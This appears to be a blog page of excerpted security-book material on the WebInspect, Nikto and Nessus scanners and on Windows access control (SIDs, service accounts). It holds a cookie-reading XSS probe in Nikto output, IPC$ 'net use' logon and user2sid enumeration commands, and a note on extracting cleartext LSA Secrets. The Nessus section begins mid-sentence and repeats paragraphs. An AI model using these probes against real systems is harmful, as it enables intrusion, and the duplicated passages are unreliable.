Monday, April 25, 2011

WebInspect






WebInspect 7.0 is a proprietary web scanner from SPI Dynamics. A license for one
target IP address is about $4,500. It is available on Windows only.
Version 7 requires Windows XP or higher, with .NET 2.0 and SQL
Server Express. If you get the error Cannot alter the login ''sa'',
because it does not exist or you do not have permission while installing SQL Server express, refer to http://support.microsoft.com/?kbid=917827 for a workaround.
If you have not previously installed .NET 2.0, you are required to log
out of Windows twice: once after the installation of the .NET package
and once after the first start up of WebInspect.

Purpose
Like Nikto, this scanner does check for some known vulnerabilities, but it also does
much more. WebInspect first crawls the web site to figure out its structure, all the
files available, the parameters used in the URL, and the web forms. It uses this information to create traffic derived from both known vulnerabilities and generic vector
attacks (SQL injection, cross-site scripting, command injection) for your web
application.
WebInspect is a great tool to test the robustness of a web application. It was used to
find cross-site scripting in Tikiwiki (an open source wiki), code execution in Oracle
Web server 10g, and information disclosure in IBM WebSphere. It can also be used
to test web services.
WebInspect Scan
A wizard drives you through the main options to start a new scan:
URL
If the web site is not on the standard port 80, you need to include the port number in the URL—for example, http://www.mydomain.net:88/.
Restrict to folder
You can restrict a scan to a folder, or to a folder with its subdirectories.
Assessment method
By default, the web site is crawled and audited at the same tine, so you get
results early. You can select “Prompt for web form values during scan.” During
the first scan, every time WebInspect finds a form, it prompts you for the values
to enter. These values are stored and used automatically for future scans. This is
especially useful if you use a web form for authentication and you want to give
WebInspect access to the private content of your web site.
Settings
See the section “Settings Tuning” later in this chapter for the scan settings.
Select a Policy
See the section “Policy Tuning” later in this chapter for more details about predefined and custom policies. To get the detailed list of checks enabled in a policy, click on Create after selecting the policy to view.
Network Authentication
WebInspect handles four types of identification: HTTP Basic, NTLM, Digest,
and Kerberos. It can automatically detect what type of authentication is used on
the web site. Enter a login and password to be used. If your authentication is
done through a web form, select “Prompt for web form values during scan” on
the first screen, as explained previously in the description for the Assessment
method.
Auto-fill web forms
You can change the default values such as zip code, email address, and so on
used in the web forms, and add more of them.
Network Proxy
You can specify an optional proxy server to use. WebInspect includes its own
Proxy. See the section “WebInspect Tools” later in this chapter for more details.
You do not need to fill out all these options. You can click on Finish at any time to
run a scan with the default option (standard policy, not network authentication, no
external proxy, and so on).
If the target is on your local network but also has a public IP address
on the Internet and uses virtual host, you may have problems scan-
ning it with a 1-IP address license from SPI. For example, the local IP
address of the target http://domain.net/ is 192.168.1.50, and its public
IP address is 212.212.212.212. You would have a license for
192.168.1.50. But if you ask WebInspect to scan http://domain.net/, it
may be resolved as 212.212.212.212 by your DNS server. To bypass
this, edit the host file c:\Windows\system32\drivers\etc\hosts and add
the following line:
192.168.1.50 domain.net www.domain.net
This file is checked first by Windows when it needs to resolve a
domain name. In this example, domain.net, www.domain.net (add more
subdomains if needed) are always resolved as 192.168.1.50.
Policy Tuning
The policy management in WebInspect is similar to Nessus (see “Policy Configuration” earlier in this chapter). A set of predefined policies already exists:
Standard
The default policy that includes nondangerous checks only. This policy can be
used on production applications.
Assault
This policy contains dangerous plug-ins and should not be used on web sites in
production.
The Assault policy contains most of the tests, but not all. Some SQL
Injection checks and SOAP assessment are not selected.
Specific groups
You can run certain types of tests: cross-site scripting and SQL injection.
You can also create your own policy from scratch or from an existing policy. To create a new policy, select Tools ➝ Policy Manager. The list of checks is displayed, organized by categories and subgroups, as shown in Figure 3-6.
The default selection corresponds to the Standard policy. You can select each test
individually, or an entire category or subgroup by clicking on the small box. You can
also change the view from display by Attack Groups to display by Severity or by
Threat Classes.
An empty box means that none of the tests inside the group have been
selected. A green square indicates that part of the tests are selected,
and a checked boxed indicates that all of them are selected.
To tweak an existing policy, select File ➝ New ➝ Assault Policy or another predefined policy. You cannot overwrite any of the predefined policies; you can only
save the modified version under a new name. The custom policies are then available
under the group Custom.
Settings Tuning
There are a couple of default settings that you may want to change for all your scans.
Select Edit ➝ Default Scan Settings to keep the changes for all the future scans, or
choose Edit ➝ Current Scan Settings for the current session only.
General ➝ Limit maximum URL hits to 15
The same URL is checked a maximum of 15 times, even if it contains variables
that can have more than 15 different values. For example, if the URL is in the
form http://www.domain.net/product.asp?id=X where X can vary from 1 to
1,000,000, WebInspect checks only 15 different values. If you think that some
web pages must be checked with all possible values references on your web site,
you can increase the default value or simply uncheck this option.
General ➝ Limit maximum crawl folder depth to 500
WebInspect crawls up to 500 levels down from the top directory. The use of a
lot of subdirectories is common with URL rewriting where a URL such as http://
www.domain.net/product.asp?type=clothes&id=1 is rewritten in a more userfriendly way such as http://www.domain.net/products/clothes/1/.
General ➝ Consecutive 'single host'/'any host' retry failures to stop scan
If WebInspect fails to reach a host more than the number of times specified, the
scan is stopped. This can be an issue if there is a network device behind WebInspect and the target that you can turn off. The device could drop some malicious traffic. You might want to simply disable this feature.
Requestor ➝ Use separate requestors
You can increase the number of threads on a powerful machine to speed up the
scan.
Session Storage
You may be interested in additional information in the report such as the list of
404 errors, or if you hit any setting threshold such as the maximum folder depth
or maximum number of hits for a single URL, etc. You can select them in the
Session Storage section.
File Not Found
WebInspect already contains a number of patterns to identify a custom 404
page. You can also add your own.
The default values are fine for most web sites, but there is such a variety of web
applications that a custom settings feature is a must have for a web scanner.
Report Analysis
If you selected the default simultaneous crawl and audit method, you get the first
results very quickly. On the left part of the report, you can find the list of pages
folder and the pages found by WebInspect. An icon shows whether a potential vulnerability was found.
By default, the folders are unfolded. You can right-click on the top
node or any folder to unfold it in order to get a good overview of all
pages found.
If you use a script to generate an image (e.g., ), this script may not be found by WebInspect. This
should be fixed in a later update.
WebInspect lists all references to external web sites. You can right-click on them,
and chose Add Host to include them in the scan, if your license allows their IP
address.
On the right in Figure 3-7, you can see that WebInspect’s dashboard gives you an
overview of how many vulnerabilities were found by severity, and how many tests
are done and how many are remaining.
At the bottom, the Scan Log Tab displays the details of the scan. The Server Information tab gives information about the server version (e.g., Apache, Microsoft IIS) and
the services running (e.g., ASP, PHP). The Vulnerabilities tab, the most important,
gives the list of vulnerabilities found for the page selected in the left pane, or for all
the subfolders and pages found in the selected directory.
To view the details of a vulnerability, double-click on one of them in the Vulnerabilities tab, or select a page on the left pane and click on Vulnerability in the center
pane, below Session Info. As shown in Figure 3-8, WebInspect gives a lot of information for each vulnerability—a description, the consequences, a possible fix, and references—that help you to understand what WebInspect finds and whether it is a
false positive (see the next section for further information on false positives).
In the middle pane, under Host Info, there is a particularly interesting feature called
Comments. It displays all the HTML comments found in the page. You would be
surprised to see what information can be found there. It is not convenient to click on
each page to see the comments, but you can export all of them into a single page to
make a search. To do so, go to File ➝ Export ➝ Scan Details and choose Comments.
You can do the same thing for hidden fields and other interesting parameters.
False Positives Analysis
Most false positives I encountered are caused by URL rewriting. WebInspect looks for
directories that are not referenced by the web site, usually because they are supposed to
be hidden (e.g., /admin, /test). But if you use URL rewriting to map, for example, http://mydomain.net/forums/ to the folder /groups, WebInspect reports /groups as a hidden
folder event, although it has exactly the same content as the virtual folder /forums.
WebInspect may also report a lot of malicious finds from a directory that uses URL
rewriting. It is common to rewrite URLs that have a lot of variables into a
user-friendly URL that uses a directory structure—for example, http://www.domain.com/product.asp?category=clothes&brand=mybrand&id=1 turns into
http://www.domain.com/products/clothes/mybrand/1. WebInspect thinks /products/clothers/mybrand/clothes is a folder and 1 is a filename. So it looks for /products/
clothes/mybrand/admin.exe, /products/clothes/mybrand/debug.pl. The web server
doesn’tt return a 404 File Not Found because the actual file is always product.asp,
admin.exe, or debug.pl, which are only parameters of a URL for the server. WebInspect doesn’t check the content of the file return (since it could change) and
relies on the web server response code. But you can work around this type of issue.
If the script product.asp is well designed, it should return an error when the ID is
malformed (not a number) or doesn’t exist. You can add this error message to the
list of custom 404 in the WebInspect settings; see “Settings Tuning,” earlier.
Another set of false positives is due to the fact that tests are not correlated with the web
server version shown in the HTTP reply. For example, the availability of /icons tells an
attacker that you are very likely running Apache, and if its content is browsable, the
version of Apache could be figured out. But this does not matter at all, as the server
name and version are part of the HTTP reply. However, this information could be
faked. There is a tradeoff between false positives and false negatives. WebInspect
seems to have chosen to give more information to avoid false negatives; this is always a
good choice for a security tool, even if it means more work to analyze the results.
Whenever you find a false positive, you can mark it as such by right-clicking on the
vulnerability in the left pane and choosing Annotate ➝ Mark As False Positive. You
can also edit the vulnerability information to change its severity and probability.
Under Session Info, there are also a number of very useful features to analyze each
vulnerability. The most used are probably the HTTP Request and Reply that shows
the request from WebInspect, and the reply from the server. This is usually enough
to determine whether this is a legitimate hit or a false positive.
The Web Browser feature under Host Info opens the page requested
by WebInspect in a real web browser. If WebInspect did a successful
cross-site scripting, you can actually see the JavaScript being executed.
WebInspect Tools
Once the audit of a web site is finished, you can use tools embedded in WebInspect
to go deeper in a vulnerability analysis or even to exploit a vulnerability found. They
are available under Tools. Here are a few of them:
HTTP Editor
You can tune any request done by WebInspect. If you think WebInspect pointed
out something interesting but did not do enough, you can tweak the request to
add a custom header, a cookie, modify a variable, and replay it, as shown in
Figure 3-9. It includes a hexadecimal editor if you need to add non-ASCII characters. There are a lot of encoding mechanisms (Base64, encryption, hash) accessible by right-clicking on the text you want to encode.
SPI Proxy
WebInspect has integrated an advanced web proxy. In the Search view, you can
search on the requests and the replies. It is interesting to see all the replies from a
particular script to understand how it behaved against bad attacks.
You must start the proxy before you start the scan. Then, in the last screen of the
scan wizard, choose “Specific proxy server” and type 127.0.0.1 for the address
and 8080 for the port. Figure 3-10 shows that all traffic is recorded, just like a
regular proxy.
SQL Injector
This tool can be used to both confirm and exploit an SQL injection vulnerability.
If you find a confirmed or possible SQL injection vulnerability in the report, copy
the URL into the SQL Injector tool. WebInspect uses different tests to determine
the database version. Unlike some simpler injection tools, it does not rely on a
generic database error message because it could be masked by the server. This
tool works with Oracle, DB2, MySQL, and SQL Server. If the database detection
is successful, it can grab the database structure and the content of each table.
WebInspect can be turned from an audit tool into an exploitation tool.
SPI Fuzzer
WebInspect includes an easy-to-use HTTP fuzzer (see Chapter 22). To start from
an existing request, select Session ➝ Raw Create, and paste the data copied from
an HTTP Request. Then highlight the part you want to fuzz and right-click to
choose Generator. There are a number of predefined generators—for example, a
number generator. Click on Configure to select the minimum (e.g., 0), maximum (e.g., 100), and increment (e.g., 1). You get a request that looks like this:
GET /product.asp?id=[IntGenerator-0] HTTP/1.0
Connection: Close
Host: domain.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Content-Type: text/plain
Given our example configuration, WebInspect generates 101 requests from id=0
to id=100 and displays the 101 replies. If you know what you are looking for
(e.g., a specific error message, a 404), you can add a filter to keep the interesting
replies only.
All these tools are very powerful and can be used independently of the regular crawl
and audit. I personally use them for further analysis of potential vulnerabilities found
during the audit.
Assessment Management Platform (AMP)
Like Nessus, WebInspect can be set up as a server where clients can connect to, and
from which you can control other WebInspect scanners. This allows you to tune the
right access you give to each pen tester for targets and types of checks.
In WebInspect 7, the SPI Monitor daemon shows in the system tray. It is used to
monitor the scheduled audits and the AMP status. It is stopped by default. You need
to specify a URL, a login, and a password for clients to access the audit.
This feature requires an additional license.

Nikto

The vast majority of Internet-facing software is web applications. While there are
only a few mail or web servers, whose security history is well known, there are thousands of web applications that do not always have a good security record. Nikto
allows network administrators to identify known vulnerable web applications and
dangerous files.
Nikto is an open source web scanner available on Linux and Windows. Nikto 1.35
can identify about 3,200 vulnerable applications or dangerous files on more than 600
servers, and it can identify more than 200 server security issues. The scanner supports SSL and nonstandard HTTP ports as well as the basic web authentication.
Types of Vulnerabilities
The most common vulnerabilities in web applications are:
SQL Injection
If the application does not correctly filter users’ form input, and uses that input
in an SQL query, it is possible to hijack the query to modify the database or get
critical information such as login ID and password.
Cross-Site Scripting (XSS)
If the user input of a web form is not properly filtered, it is possible to inject
code (HTML, JavaScript) into a web page. This allows attackers to inject malicious code to a page trusted by the users.
PHP include
A common mistake is to include a page through a URL variable. The value of the
variable could be changed to point to a remote page that would be executed
locally on the server.
Information leak
Configuration files and lists of users or passwords may be left readable on a web
server. Sometimes, it is possible to trick a web application into displaying local
files.
Credential escalation
Some poorly written applications allow anybody to escalate their privileges
through undocumented variables. These hidden variables can often be easily
found and exploited.
Nikto looks for all of these vulnerabilities. It contains a list of such vulnerabilities in
known applications and tests the presence and behavior of these vulnerable pieces of
code.
Command Line
Nikto is a command-line utility. To start a scan and save the report, type:
[julien@asus ~]# nikto -host domain.net –Format csv –output nikto.csvt
---------------------------------------------------------------------------
- Nikto 1.35/1.34 - www.cirt.net
+ Target IP: 192.168.0.1
+ Target Hostname: domain.net
+ Target Port: 80
+ Start Time: Fri Mar 9 10:18:37 2007
---------------------------------------------------------------------------
- Scan is dependent on "Server" string which can be faked, use -g to override
+ Server: Apache/2.0.52 (CentOS)
- Retrieved X-Powered-By header: PHP/5.1.6
+ Apache/2.0.52 appears to be outdated (current is at least
Apache/2.0.54). Apache 1.3.33 is still maintained and considered secure.
+ 2.0.52 (CentOS) - TelCondex Simpleserver 2.13.31027 Build 3289 and
below allow directory traversal with '/.../' entries.
Nikto first gets information about the server. It uses it to filter out the CGI and dangerous files to test:
+ /icons/ - Directory indexing is enabled, it should only be enabled for
specific directories (if required). If indexing is not used at all, the /icons
directory should be removed. (GET)
Nikto tests the server configuration. Then it looks for dangerous files and vulnerable
CGIs:
+ /admin/config.php - Needs Auth: (realm "Access protected) / - TRACE option
+ appears to allow XSS or credential theft. See
http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)
+ //admin/admin.shtml - Needs Auth: (realm "Access protected)
[...]
/index.php?topic=<script>alert(document.cookie)</
script>%20
- This might be interesting... has been seen in web logs from an unknown scanner.
(GET)
+ 2563 items checked - 14 item(s) found on remote host(s)
+ End Time: Fri Mar 9 10:20:22 2007 (105 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
The scan is very fast (105s) on a small web site. A complete scan with all the plug-ins
(using the –g option) takes only 40 seconds more.
The report can be saved in text (-Format txt), HTML (-Format hml) or CSV (-Format
csv) format.
Be careful with a report in HTML format. Nikto does not escape the
links. The HTML report can contain dangerous JavaScript or characters.
If you scan an HTTPS server, use the options –ssl –port 443 to run the scan. If some
directories require web authentication, you can provide the login and password
information to Nikto with the option –id login:password.
There are a lot of false positives. With a scan specific on my personal server, Nikto
found 14 potential issues. Only two are truly potential issues: directory listing of /icons
and the allowed use of TRACE. The potential PHP vulnerabilities, the potential cross-site
scripting, etc., do not apply. The full scan (-generic option) displays two more potential issues that are also two more false positives.
If Nikto finds a CGI with the same filename as a vulnerable application, you might consider changing its name, even if it is secured. Nikto
is widely used by script kiddies who will hammer the CGI if it is
reported as vulnerable during a scan.
Evasion Techniques
Unfortunately, Nikto added options to evade an Intrusion Detection System (IDS). I
think it is unfortunate because this tool should not be used to test an IDS. Nikto was
designed to quickly find known vulnerable software. Most of the CGIs it looks for
are very old and do not always try to exploit vulnerability. Some tests check only
whether the filename of a page is the same as known vulnerable software (/cgi-bin/
mail.pl, for example). This does not mean the CGI installed is vulnerable to any-
thing, and a request to such a script is legitimate.
The default traffic generated by Nikto can easily be flagged by an IDS since each
HTTP request contains “Nikto/1.35” in the user-agent header. With one signature,
an IDS would detect all the tests. The evasion options do not necessarily make it
harder for the IDS to detect something.
To add an evasion technique, use the option –evasion followed by steps 1–9:
1. URL encoding. The URL is encoded. Today’s high-end IDS can manage encoded
URLs without a problem. This evasion technique does not make any difference
to a sophisticated IDS.
2. Add /./ in front of each URL. With the same URL decoding feature used for the
previous evasion technique, the IDS easily restores the original URL. Since this is
a known evasion technique, this technique would probably be detected by most
IDSes, making it less than useless.
3. Premature URL ending. Nikto actually adds random folders followed by /../. For
example, instead of requesting /icons, Nikto requests /foo/bar/../../icons, which is
functionally the exact same thing. As in evasion 2, not only can the IDS under-
stand the canonical URL just like the web server, it also detects the /../ as a directory traversal, a well-known technique.
4. Append random long strings. Same technique as before, but with much longer
strings and the same results.
5. Fake parameters. Add unnecessary parameters (/uri/?foo=bar). This does not
make any difference to a decent IDS.
6. Tab as request spacer. Use a tab instead of a space to separate the different elements of the URL. Once again, this does not bother a decent IDS.
7. Case-insensitivity. Change random characters to uppercase. Windows servers do
not care about case-insensitivity, so the test would be valid in this instance. But
for most other systems that are case-sensitive (e.g., *nix), the new URLs created
do not make sense. For example, /cgi-bin/mail.pl is different from /cgi-BIn/
mAIl.Pl for Apache on Linux. This evasion technique should be used very
carefully.
8. Use \ as folder separation. This is the same case as above. Using \ instead of /
may be fine with IIS on Windows, but it is not for *nix: the new URL would not
make sense.
You may argue that Internet Explorer allows you to use indifferently /
or \ in a URL regardless of the web server, but it actually translates \ to
/ when it does the request.
9. Session splicing. This is the only interesting evasion technique, even if it is quite
old. It is basically Nikto + fragroute (http://monkey.org/~dugsong/fragroute/).
Nikto generates one byte data packets. It is a good way to easily test how an IDS
handles heavily fragmented traffic without the hassle of installing fragrouter.
Nikto should be used to detect vulnerable applications that should not have been
installed on a network. But it should not be used to test the coverage of an IDS, even
if the addition of evasion techniques suggest that it has been designed for this. By the
same token, Nessus also contains checks for vulnerable CGIs, but not as many as
Nikto.

Nessus scan




local vulnerabilities. Nessus looks at specific well-known security vulnerabilities, but
also does generic checks, such as looking for file permissions or sensible configura-
tion files.
The login and password information are part of the policy. This means that if you
want to connect to servers that have different passwords, you have to create a new
policy for each of them. In the Windows client, the credentials are accessible after
clicking on Edit Settings, as shown in Figure 3-2.
Network Scan
You can run a scan from inside your network to get as much information as you can
on potential vulnerabilities or weaknesses. Or you can scan your network from the
outside to understand how an attacker sees it. You want to do a thorough analysis of
all servers at the interface between your local network and the Internet, usually your
DMZ zone: mail server, HTTP server with web applications, and VPN server.
You can start a scan simply by inputting the IP address or hostname of the targets.
Nessus proposes four types of scan:
Nonintrusive scan
This is best suited to scan targets in a production network. A scan of one target
on a 100 MB network from a Windows XP client takes about 25 minutes.
Intrusive scan
This enables all plug-ins, including dangerous checks that can harm the target.
This scan takes about 30 minutes for one target.
Predefined policy
Use a predefined or customized policy defined earlier. Check the section “Policy
Configuration” later in this chapter for more details.
New policy
Define a new policy to use for the scan. Check the later section “Policy Configu-
ration” for more details.
If your goal is to test a remote server, do not forget to turn off any anti-
virus, firewall, or other security software running on the Nessus server.
This software may drop some of the traffic generated by Nessus.
Nessus first does a port scan to identify the services running and the target operating
system (see Chapter 2). It uses a combination of features to determine what the tar-
get is running. Here is what it tries to discover:
• What services are running? For example, SSH and NTP are more common on a
Unix machine, NetBios and MS-RPC are more on common on Windows.
• How the target reacts to malformed ICMP packets.
• SNMP information.
• Information gathered from an NTP service.
To get more information about operating system fingerprints, check out Chapter 2
and examples related to p0f (see Section 4.4).
The port-scanning phase is very important. It is used by Nessus to know what plug-
ins are relevant (Apache or ISS plug-ins for a web server, Linux or Windows vulnera-
bilities, etc.), and what service is running on what port. Nessus can detect services on
nonstandard ports.
If you scan a large network, it is more efficient to place one Nessus
server per network segment.
There could be false detection if the target is behind a Port Address Translator, since
each port could correspond to a different operating system. A firewall between the
Nessus server and the target could drop the malformed ICMP traffic. This would
then lead in false positives in vulnerabilities found by Nessus. If you know the details
of the machine you are scanning, it is possible to tell Nessus what operating system
or services are running on the host in a policy (see the section “Policy Configura-
tion” later in this chapter).
If you run a web server with virtual hosts—that is you have different web domains
with the same IP address—you need to indicate the list of virtual hosts to Nessus.
Where you enter the IP address of the target, add the hostnames between brackets:
192.168.1.1[domain.com domain.net domain.org]. You can save it in the address book
to avoid typing a long list all the time.
If you happen to scan a network printer, the printer may print garbage
characters indefinitely. It often happens with network printers using
CUPS. You should exclude the IP address of all your network printers.
Scan Results
At the end of a scan, Nessus generates a report that provides a list of all open ports
and the potential risks associated. If you use any encryption (SSH, HTTPS, IMAPS,
SMTPS), Nessus analyzes the algorithms allowed and warns you if any weak encryption mechanism are allowed (see Figure 3-3).
If you run a web server with virtual hosts—that is you have different web domains
with the same IP address—you need to indicate the list of virtual hosts to Nessus.
Where you enter the IP address of the target, add the hostnames between brackets:
192.168.1.1[domain.com domain.net domain.org]. You can save it in the address book
to avoid typing a long list all the time.
If you happen to scan a network printer, the printer may print garbage
characters indefinitely. It often happens with network printers using
CUPS. You should exclude the IP address of all your network printers.
Scan Results
At the end of a scan, Nessus generates a report that provides a list of all open ports
and the potential risks associated. If you use any encryption (SSH, HTTPS, IMAPS,
SMTPS), Nessus analyzes the algorithms allowed and warns you if any weak encryp-
tion mechanism are allowed (see Figure 3-3).
You may see a list of more specific issues (such as a list of vulnerable software ver-
sions that you run) or known vulnerable CGI scripts.
All these results should be double-checked; there are often a lot of false positives:
• A firewall or other security device may have detected the ongoing scan. My firewall can detect the scan after a few seconds and blocks all traffic generated by
Nessus. The report shows a lot of open ports that do not exist on the target
because it misinterpreted the dropped packets (see Chapter 2). Nessus may also
display that it was able to crash the target when the traffic was actually dropped
by the firewall.
• Some vulnerability checks are too superficial. Sometimes, a plug-in looks for the
version in the banner only. This may not be enough to know whether the service is actually vulnerable. It is possible that the server has been patched without changing the software version, or that the vulnerable options are not
enabled. See “Plug-in Code Example” later in this chapter to understand how to
verify what a plug-in is actually doing.
• If a service or server is incorrectly identified, checks that do not apply to the
actual version may give wrong results.
The scan results highlight potential issues that should then be checked one by one.
This is a good base to start tightening up the security of the servers running on a network. But like all the tools described in this book, some manual work is necessary to
analyze the results, and other security checks with other tools should be performed.
All reports are automatically saved. They can be reviewed later. You can also com-
pare two reports to see whether you actually did increase the security of the target
between the last scan, or whether the target was modified since the last scan.
Policy Configuration
Instead of running a full scan, it is possible to customize the areas that should be
checked. By reducing the number of checks that are done and by tuning the default
settings, you both reduce the duration of the scan and improve its accuracy.
The settings are associated with a policy. This means that each target that requires
special settings (different passwords for example) requires its own policy. You can not clone a policy; this makes Nessus hard to use accurately on a large networks.
To modify the default settings, create a new policy and click on Edit Settings. Under
the General tab, you can select how thorough the test will be. For a full scan, unselect
Safe Check and select “Thorough tests.” For more verbose output (but also more false
positives), select Paranoid for report paranoia and “verbose Report” for verbosity.
The Credentials tab contains settings used for local vulnerability checks. See “Local
Vulnerabilities” earlier in this section for more information.
The tabs for Others and Web contain login and password information for different
services, as shown in Figure 3-4. This information is needed to perform all the tests.
If you have subscribed to the Direct Plugin Feed, you can add your compliance policy files under the Compliance tab. These files describe your company policies for
different OSs. Nessus can check whether the targets comply with them.
You can select the list of plug-ins to enable by clicking Edit Plugins. By default, all
plug-ins shown are enabled. However, it you selected “Safe checks” in the settings,
the plug-ins considered dangerous (denial of service, exploitation of a vulnerability,
etc.) are not run.

WINDOWS : ACCESS CONTROL OVERVIEW

ACCESS CONTROL OVERVIEW
The security subsystem is the primary gatekeeper through which subjects access objects
within the Windows operating system. We use the terms subjects generically here to
describe any entity that performs some action, and objects to mean the recipient of that
action. In Windows, subjects are processes (associated with access tokens), and objects are
securable objects (associated with security descriptors).
Processes are the worker bees of computing. They perform all useful work (together
with subprocess constructs called threads). Securable objects are the things that get acted
upon. Within Windows are many types of securable objects: files, directories, named
pipes, services, Registry keys, printers, networks shares, and so on.
When a user logs on to Windows (that is, authenticates), the operating system creates
an access token containing security identifiers (SIDs) correlated with the user’s account
and any group accounts to which the user belongs. The token also contains a list of the
privileges held by the user or the user’s groups. We’ll talk in more detail about SIDs and
privileges later in this chapter. The access token is associated with every process created
by the user on the system.
When a securable object is created, a security descriptor is assigned that contains a
discretionary access control list (DACL, sometimes generalized as ACL) that identifies which
user and group SIDs may access the object, and how (read, write, execute, and so on).
To perform access control, the Windows security subsystem simply compares the
SIDs in the subject’s token to the SIDs in the object’s ACL. If a match is found, access is
permitted; otherwise, it is denied.
The remainder of this chapter will take a more detailed look at subjects, since they are
the only way to access objects (absent kernel-mode control, again). For further information
on securable objects, see “References and Further Reading.”
SECURITY PRINCIPALS
As we noted earlier, the fundamental subject within Windows is the process. We also
noted that processes must be associated with a user account in order to access securable
objects. This section will explore the various account types in Windows, since they are
the foundation for most attacks against access control.
Windows offers three types of fundamental accounts, called security principals:
• Users
• Groups
• Computers
We’ll discuss each of these in more detail shortly, just after we take a brief detour to
discuss SIDs.
SIDs
In Windows, security principals generally have friendly names, such as Administrator or
Domain Admins. However, the NT family manipulates these objects internally using a
globally unique 48-bit number called a security identifier, or SID. This prevents the system
from confusing the local Administrator account from Computer A with the identically
named local Administrator account from Computer B, for example.
The SID comprises several parts. Let’s take a look at a sample SID:
S-1-5-21-1527495281-1310999511-3141325392-500
A SID is prefixed with an S, and its various components are separated with hyphens.
The first value (in this example, 1) is the revision number, and the second is the identifier
authority value. Then four subauthority values (21 and the three long strings of numbers,
in this example) and a relative identifier (RID—in this example, 500) make up the remainder
of the SID.
SIDs may appear complicated, but the important concept for you to understand is that
one part of the SID is unique to the installation or domain and another part is shared across
all installations and domains (the RID). When Windows is installed, the local computer
generates a random SID. Similarly, when a Windows domain is created, it is assigned a
unique SID (we’ll define domains later in this chapter). Thus, for any Windows computer or
domain, the subauthority values will always be unique (unless purposely tampered with
or duplicated, as in the case of some low-level disk-duplication techniques).
However, the RID is a consistent value across all computers or domains. For example,
a SID with RID 500 is always the true Administrator account on a local machine. RID 501
is the Guest account. On a domain, RIDs starting with 1001 indicate user accounts. (For
example, RID 1015 would be the fifteenth user account created in the domain.) Suffice to
say that renaming an account’s friendly name does nothing to its SID, so the account can
always be identified, no matter what. Renaming the true Administrator account changes
only the friendly name—the account is always identified by Windows (or a malicious
hacker with appropriate tools) as the account with RID 500.
Why You Can’t Log on as Administrator Everywhere
As is obvious by now (we hope), the Administrator account on one computer is different
from the Administrator account on another because they have different SIDs, and
Windows can tell them apart, even if humans can’t. This feature can cause headaches for
the uninformed hacker.
Occasionally in this book, we will encounter situations where logging on as
Administrator fails. Here’s an example:
C:\>net use \\192.168.234.44\ipc$ password /u:Administrator
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
A hacker might be tempted to turn away at this point, without recalling that Windows
automatically passes the currently logged-on user’s credentials during network logon
attempts. Thus, if the user were currently logged on as Administrator on the client, this
logon attempt would be interpreted as an attempt to log on to the remote system using
the local Administrator account from the client. Of course, this account has no context on
the remote server. You can manually specify the logon context using the same net use
command with the remote domain, computer name, or IP address prepended to the
username with a backslash, like so:
C:\>net use \\192.168.234.44\ipc$ password /u:domain\Administrator
The command completed successfully.
Obviously, you should prepend the remote computer name or IP address if the
system to which you are connecting is not a member of a domain. Remembering this
little trick will come in handy when we discuss remote shells in Chapter 7; the technique
we use to spawn such remote shells often results in a shell running in the context of the
SYSTEM account. Executing net use commands within the LocalSystem context cannot
be interpreted by remote servers, so you almost always have to specify the domain or
computer name, as shown in the previous example.
Viewing SIDs with user2sid/sid2user
You can use the user2sid tool from Evgenii Rudnyi to extract SIDs. Here is user2sid being
run against the local machine:
C:\>user2sid \\caesars Administrator
S-1-5-21-1507001333-1204550764-1011284298-500
Number of subauthorities is 5
Domain is CORP
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
The sid2user tool performs the reverse operation, extracting a username given a SID.
Here’s an example using the SID extracted in the previous example:
C:\>sid2user \\caesars 5 21 1507001333 1204550764 1011284298-500
Name is Administrator
Domain is CORP
Type of SID is SidTypeUser
Note that the SID must be entered starting at the identifier authority number (which is
always 5 in the case of Windows Server 2003), and spaces are used to separate components,
rather than hyphens.
Users
Anyone with even a passing familiarity with Windows has encountered the concept of
user accounts. We use accounts to log on to the system and to access resources on the
system and the network. Few have considered what an account really represents,
however, which is one of the most common security failings on most networks.
Quite simply, an account is a reference context in which the operating system executes
code. Put another way, all user mode code executes in the context of a user account. Even some
code that runs automatically before anyone logs on (such as services) runs in the context
of an account (often as the special and all-powerful SYSTEM, or LocalSystem, account).
All commands invoked by the user who successfully authenticates using the account
credentials are run with the privileges of that user. Thus, the actions performed by
executing code are limited only by the privileges granted to the account that executes it.
The goal of the malicious hacker is to run code with the highest possible privileges. Thus,
the hacker must “become” the account with the highest possible privileges.
Built-ins
Windows comes out of the box with built-in accounts that have predefined privileges.
These default accounts include the local Administrator account, which is the most
powerful user account in Windows. (Actually, the SYSTEM account is technically the
most privileged, but Administrator can execute commands as SYSTEM quite readily
using the Scheduler Service to launch a command shell, for example.) Table 2-1 lists the
default built-in accounts on various versions of Windows.
Note a few caveats about Table 2-1:
• On domain controllers, some security principals are not visible in the default
Active Directory Users and Computers interface unless you choose View |
Advanced Features.
• Versions of Windows including XP and later “hide” the local Administrator
account by default, but it’s still there.
• Some of the accounts listed in Table 2-1 are not created unless specific server
roles have been configured; for example, Application Server (IIS).
• The group Guests, the user accounts Guest, and Support_388945a0 are assigned
unique SIDs corresponding to the domains in which they reside.
Service Accounts
Service account is an unofficial term used to describe a Windows user account that
launches and runs a service non-interactively (a more traditional computing term is batch
accounts). Service accounts are typically not used by human beings for interactive logon,
but are used to start up and run automated routines that provide certain functionality to
the operating system on a continuous basis. For example, the Indexing service, which
indexes contents and properties of files on local and remote computers, and is located in
%systemroot%\System32\cisvc.exe, can be configured to start up at boot time using the
Services control panel. For this executable to run, it must authenticate to the operating
system. For example, the Indexing service authenticates and runs as the LocalSystem
account on Windows Server 2003 in its out-of-the-box configuration.
Service accounts are a necessary evil in Windows. Because all code must execute in
the context of an account, they can’t be avoided. Unfortunately, because they are
designed to authenticate in an automated fashion, the passwords for these accounts
must be provided to the system without human interaction. In fact, Microsoft designed
the Windows NT family to cache passwords for service accounts on the local system.
This was done for the simple convenience that many services need to start up before the
network is available (at boot time), and thus could not be authenticated to domain
controllers. By caching the passwords locally, this situation is avoided. Here’s the
kicker:
Non-SYSTEM service account passwords are stored in cleartext in a portion of the Registry
called the LSA Secrets, which is accessible only to LocalSystem.
We highlighted this sentence because it leads to one of the major security failings of the
Windows OS: If a malicious hacker can compromise a Windows NT family system with
Administrator-equivalent privileges, he or she can extract the cleartext passwords for
service accounts on that machine.
“Yippee,” you might be saying, if you’re already Administrator-equivalent on the
